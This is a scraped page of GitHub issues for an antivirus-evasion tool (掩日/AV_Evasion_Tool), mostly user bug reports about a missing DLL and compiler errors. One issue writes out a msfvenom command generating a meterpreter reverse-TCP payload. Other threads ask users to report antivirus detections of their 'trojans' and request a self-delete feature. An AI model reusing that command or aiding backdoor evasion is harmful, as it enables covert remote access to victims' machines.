Code Monkey home page Code Monkey logo

av_evasion_tool's Issues

12

更新了主程序都运行不起来了?

诚挚的邀请您加入CT stack社区

1y0n师傅
您好,我是 CT Stack 安全社区的运营jarcis。发现您的AV_Evasion_Tool工具非常优质,特邀您加入我们平台。因未找到您的联系方式,所以只能采取这样的形式,非常抱歉。
CT Stack 安全社区隶属于长亭科技,守护安全工具成长,可帮助运营、推广安全工具。每月评选优质工具打造专题月,可为工具量身定制玩法,集中收集工具使用反馈,辅助工具迭代。
如您有意向,可添加社区微信客服(客服号:CTStack)

被杀反馈

每次都是更新放出来不久就被杀,我也很无奈。如果你的马被杀了,就在此留下反馈吧。反馈应包含杀软名称、版本(默认最新版)、查杀提示(截图最好)。

打开显示缺少必要环境

gcc --version
gcc (MinGW.org GCC-8.2.0-5) 8.2.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

安装后是8.2.0
打开显示缺少必要环境,但是三个我都满足了吖?求助一下

粘贴shellcode进去之后,报错“无法加载DLL YR3.dll:找不到指定模块,异常来自HRESULT:0x8007007E ”

大佬好。

gcc环境已装好,杀毒已关,路径无中文。机器为win10

有关调用实时(JIT)调试而不是此对话框的详细信息,
请参见此消息的结尾。

************** 异常文本 **************
System.DllNotFoundException: 无法加载 DLL“YR3.dll”: 找不到指定的模块。 (异常来自 HRESULT:0x8007007E)。
在 掩日3._0.Form1.Generate(String input, String output, Boolean x64)
在 掩日3._0.Form1.Binary_Handler(String binary_path, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.Shellcode_Handler(String raw_shellcode, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.CtrlV()
在 掩日3._0.Form1.radioButton1_KeyDown(Object sender, KeyEventArgs e)
在 System.Windows.Forms.Control.OnKeyDown(KeyEventArgs e)
在 System.Windows.Forms.ButtonBase.OnKeyDown(KeyEventArgs kevent)
在 System.Windows.Forms.Control.ProcessKeyEventArgs(Message& m)
在 System.Windows.Forms.Control.WmKeyChar(Message& m)
在 System.Windows.Forms.Control.WndProc(Message& m)
在 System.Windows.Forms.ButtonBase.WndProc(Message& m)
在 System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

image

Not work

它不工作只是突然停止运行加密文件

免杀后门无法正常工作

加载到10000时出现异常
捕获

gcc版本:gcc (tdm64-1) 10.3.0
Copyright (c) 2020 Free Software Foundation, Inc.

c文件生成脚本: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=1111 -f psh-reflection >xy.c

报错

生成x86没问题,生成x64就报错
微信截图_20200907210739

关于掩日

那么问题来了~

  • 掩日到底是谁?跟惊鲵有什么关系?
  • 潜伏进入农家的目的是什么?
  • 沧海还能不能流了?

:D

这个项目开源吗

逛了一圈没找到3.x版本的源码
是不是没把代码放出来,还是因为我没找到。。

大佬你的博客

大佬你的博客能我进去康康不 让我瞅瞅 我觉得里面肯定有好东西 你让我看一眼就

Suggest

It should be great to add a self-delete function.

生成失败

显示生成文件成功,但是实际上没有生成该文件

Error DLL not Found !!

大佬好。

gcc环境已装好,杀毒已关,路径无中文。机器为win10

有关调用实时(JIT)调试而不是此对话框的详细信息,
请参见此消息的结尾。

************** 异常文本 **************
System.DllNotFoundException: 无法加载 DLL“YR3.dll”: 找不到指定的模块。 (异常来自 HRESULT:0x8007007E)。
在 掩日3._0.Form1.Generate(String input, String output, Boolean x64)
在 掩日3._0.Form1.Binary_Handler(String binary_path, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.Shellcode_Handler(String raw_shellcode, String method, String inject, Boolean x64, String final_path)
在 掩日3._0.Form1.CtrlV()
在 掩日3._0.Form1.radioButton1_KeyDown(Object sender, KeyEventArgs e)
在 System.Windows.Forms.Control.OnKeyDown(KeyEventArgs e)
在 System.Windows.Forms.ButtonBase.OnKeyDown(KeyEventArgs kevent)
在 System.Windows.Forms.Control.ProcessKeyEventArgs(Message& m)
在 System.Windows.Forms.Control.WmKeyChar(Message& m)
在 System.Windows.Forms.Control.WndProc(Message& m)
在 System.Windows.Forms.ButtonBase.WndProc(Message& m)
在 System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.